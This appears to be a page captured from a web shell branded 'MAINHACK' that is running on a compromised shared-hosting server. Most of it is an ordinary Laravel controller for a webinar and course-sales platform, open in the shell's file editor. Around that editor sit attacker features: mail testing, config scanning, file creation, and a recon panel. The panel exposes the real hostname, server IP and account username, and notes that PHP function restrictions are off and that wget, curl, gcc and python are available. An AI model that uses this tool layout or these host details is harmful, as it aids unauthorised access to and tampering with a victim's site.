[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: WebinarsController.php
<?php namespace App\Http\Controllers\Api\Panel; use App\Http\Controllers\Api\Controller; use App\Http\Resources\PurchaseResource; use App\Mixins\Cashback\CashbackRules; use App\Models\Api\Sale; use App\Models\Api\Webinar; use App\Models\Api\Gift; use App\Models\WebinarPartnerTeacher; use Illuminate\Database\Eloquent\Builder; use Illuminate\Http\Request; use Illuminate\Support\Facades\DB; class WebinarsController extends Controller { public function show($id) { $user = apiAuth(); $webinar = Webinar::query()->where('id', $id) ->where(function (Builder $query) use ($user) { $query->where('creator_id', $user->id); $query->orWhere('teacher_id', $user->id); })->first(); if (!empty($webinar)) { $cashbackRules = null; $data = $webinar->brief; if (!empty($data["price"]) and getFeaturesSettings('cashback_active') and (empty($user) or !$user->disable_cashback)) { $cashbackRulesMixin = new CashbackRules($user); $cashbackRules = $cashbackRulesMixin->getRules('courses', $data["id"], $data["type"], null, null); } $data["cashbackRules"] = $cashbackRules; return apiResponse2(1, 'retrieved', trans('api.public.retrieved'), $data); } return apiResponse2(0, 'invalid', trans('api.public.invalid')); } public function list(Request $request, $id = null) { return [ 'my_classes' => $this->myClasses($request), 'purchases' => $this->purchases($request), 'organizations' => $this->organizations($request), 'invitations' => $this->invitations($request), ]; } public function myClasses(Request $request) { $user = apiAuth(); $webinars = Webinar::where(function ($query) use ($user) { if ($user->isTeacher()) { $query->where('teacher_id', $user->id); } elseif ($user->isOrganization()) { $query->where('creator_id', $user->id); } })->handleFilters()->orderBy('updated_at', 'desc')->get()->map(function ($webinar) { return $webinar->brief; }); return $webinars; } public function indexPurchases() { return apiResponse2(1, 'retrieved', trans('api.public.retrieved'), [ 'purchases' => $this->purchases() ]); } public function free(Request $request, $id) { $user = apiAuth(); $course = Webinar::where('id', $id) ->where('status', 'active') ->first(); abort_unless($course, 404); $checkCourseForSale = $course->checkCourseForSale($user); if ($checkCourseForSale != 'ok') { return apiResponse2(0, $checkCourseForSale, trans('api.course.purchase.' . $checkCourseForSale)); } if (!empty($course->price) and $course->price > 0) { return apiResponse2(0, 'not_free', trans('api.cart.not_free')); } Sale::create([ 'buyer_id' => $user->id, 'seller_id' => $course->creator_id, 'webinar_id' => $course->id, 'type' => Sale::$webinar, 'payment_method' => Sale::$credit, 'amount' => 0, 'total_amount' => 0, 'created_at' => time(), ]); return apiResponse2(1, 'enrolled', trans('api.webinar.enrolled')); } public function purchases() { $user = apiAuth(); $giftsIds = Gift::query()->where('email', $user->email) ->where('status', 'active') ->whereNull('product_id') ->where(function ($query) { $query->whereNull('date'); $query->orWhere('date', '<', time()); }) ->whereHas('sale') ->pluck('id') ->toArray(); $query = Sale::query() ->where(function ($query) use ($user, $giftsIds) { $query->where('sales.buyer_id', $user->id); $query->orWhereIn('sales.gift_id', $giftsIds); }) ->whereNull('sales.refund_at') ->where('access_to_purchased_item', true) ->where(function ($query) { $query->where(function ($query) { $query->whereNotNull('sales.webinar_id') ->where('sales.type', 'webinar') ->whereHas('webinar', function ($query) { $query->where('status', 'active'); }); }); $query->orWhere(function ($query) { $query->whereNotNull('sales.bundle_id') ->where('sales.type', 'bundle') ->whereHas('bundle', function ($query) { $query->where('status', 'active'); }); }); $query->orWhere(function ($query) { $query->whereNotNull('gift_id'); $query->whereHas('gift'); }); }); $sales = deepClone($query) ->with([ 'webinar' => function ($query) { $query->with([ 'files', 'reviews' => function ($query) { $query->where('status', 'active'); }, 'category', 'teacher' => function ($query) { $query->select('id', 'full_name'); }, ]); $query->withCount([ 'sales' => function ($query) { $query->whereNull('refund_at'); } ]); }, 'bundle' => function ($query) { $query->with([ 'reviews' => function ($query) { $query->where('status', 'active'); }, 'category', 'teacher' => function ($query) { $query->select('id', 'full_name'); }, ]); } ]) ->orderBy('created_at', 'desc') ->get(); $time = time(); $giftDurations = 0; $giftUpcoming = 0; $giftPurchasedCount = 0; foreach ($sales as $sale) { $purchaseDate = $sale->created_at; if (!empty($sale->gift_id)) { $gift = $sale->gift; $purchaseDate = $gift->date; $sale->webinar_id = $gift->webinar_id; $sale->bundle_id = $gift->bundle_id; $sale->webinar = !empty($gift->webinar_id) ? $gift->webinar : null; $sale->bundle = !empty($gift->bundle_id) ? $gift->bundle : null; $sale->gift_recipient = !empty($gift->receipt) ? $gift->receipt->full_name : $gift->name; $sale->gift_sender = $sale->buyer->full_name; $sale->gift_date = $gift->date;; /*$giftPurchasedCount += 1; if (!empty($sale->webinar)) { $giftDurations += $sale->webinar->duration; if ($sale->webinar->start_date > $time) { $giftUpcoming += 1; } } if (!empty($sale->bundle)) { $bundleWebinars = $sale->bundle->bundleWebinars; foreach ($bundleWebinars as $bundleWebinar) { $giftDurations += $bundleWebinar->webinar->duration; } }*/ } if (!empty($sale->webinar)) { if ($sale->webinar->access_days > 0) { $sale->expired = strtotime("+{$sale->webinar->access_days} days", $purchaseDate) < $time; $sale->expired_at = strtotime("+{$sale->webinar->access_days} days", $purchaseDate); } else { $sale->expired = false; $sale->expired_at = null; } } else if (!empty($sale->bundle)) { if ($sale->bundle->access_days > 0) { $sale->expired = strtotime("+{$sale->bundle->access_days} days", $purchaseDate) < $time; $sale->expired_at = strtotime("+{$sale->bundle->access_days} days", $purchaseDate); } else { $sale->expired = false; $sale->expired_at = null; } } } return PurchaseResource::collection($sales); } public function invitations(Request $request) { $user = apiAuth(); $invitedWebinarIds = WebinarPartnerTeacher::where('teacher_id', $user->id)->pluck('webinar_id')->toArray(); $webinars = Webinar::where('status', 'active') ->whereIn('id', $invitedWebinarIds) ->handleFilters() ->orderBy('updated_at', 'desc')->get()->map(function ($webinar) { return $webinar->brief; }); return $webinars; } public function organizations() { $user = apiAuth(); // $user=User::find(927) ; $webinars = Webinar::where('creator_id', $user->organ_id) ->where('status', 'active')->handleFilters() ->orderBy('created_at', 'desc') ->orderBy('updated_at', 'desc')->get()->map(function ($webinar) { return $webinar->brief; }); return $webinars; } public function indexOrganizations() { return apiResponse2(1, 'retrieved', trans('api.public.retrieved'), [ 'webinars' => $this->organizations() ]); } public function offlinePurchases() { $user = apiAuth(); $sales = Sale::where('sales.buyer_id', $user->id) ->whereNull('sales.refund_at') ->where('access_to_purchased_item', true) ->where(function ($query) { $query->where(function ($query) { $query->whereNotNull('sales.webinar_id') ->where('sales.type', 'webinar') ->whereHas('webinar', function ($query) { $query->where('status', 'active'); }); }); $query->orWhere(function ($query) { $query->whereNotNull('sales.bundle_id') ->where('sales.type', 'bundle') ->whereHas('bundle', function ($query) { $query->where('status', 'active'); }); }); })->with([ 'webinar' => function ($query) { $query->with([ 'files', 'reviews' => function ($query) { $query->where('status', 'active'); }, 'category', 'teacher' => function ($query) { $query->select('id', 'full_name'); }, ]); $query->withCount([ 'sales' => function ($query) { $query->whereNull('refund_at'); } ]); }, 'bundle' => function ($query) { $query->with([ 'reviews' => function ($query) { $query->where('status', 'active'); }, 'category', 'teacher' => function ($query) { $query->select('id', 'full_name'); }, ]); } ]) ->orderBy('created_at', 'desc') ->get(); return apiResponse2(1, 'retrieved', trans('api.public.retrieved'), [ $sales ]); } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.84 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285